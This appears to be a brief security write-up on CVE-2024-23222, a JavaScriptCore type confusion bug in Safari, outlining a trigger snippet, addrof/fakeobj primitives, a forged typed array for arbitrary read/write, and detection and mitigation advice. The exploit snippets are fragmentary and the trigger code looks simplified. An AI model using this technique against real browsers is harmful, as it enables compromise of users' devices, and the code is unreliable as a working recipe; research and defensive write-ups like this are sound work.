Overview
CVE-2024-23222 is a type confusion vulnerability in JavaScriptCore that enables a malicious web page to corrupt the JS heap and gain arbitrary read/write inside the Safari renderer.
In this write-up we will:
- Trigger the bug from a minimal HTML PoC.
- Build the fakeobj / addrof primitives.
- Pivot to arbitrary R/W inside Safari.
- Discuss detection and mitigation.
⚠️ For research and lawful security testing only.
1. Bug primer
The optimizer fails to invalidate a speculation guard when an attacker mutates __proto__ between two type checks. This lets us alias a JSArray of doubles with an ArrayBuffer view.
function trigger() {
let arr = [1.1, 2.2, 3.3];
let oob = new ArrayBuffer(0x1000);
arr.__proto__ = oob.__proto__;
return arr[0x100]; // OOB read
}2. addrof / fakeobj
With the OOB primitive in hand, we build the classic pair:
| Primitive | Purpose |
|---|---|
addrof(o) | Leak the address of any JS object |
fakeobj(p) | Materialize a JSObject at attacker-controlled p |
3. Pivot to R/W
We forge a fake Uint32Array whose vector pointer we control, giving us arbitrary read/write within the renderer process.
let fake = fakeobj(addrof(victim) + 0x10);
fake[0] = 0x41414141;4. Detection
Look for repeated __proto__ swaps between numeric arrays and typed array views in renderer logs. Lockdown Mode disables the JIT path that makes this bug exploitable.
References
- Apple HT214061
- WebKit bug tracker entry 267047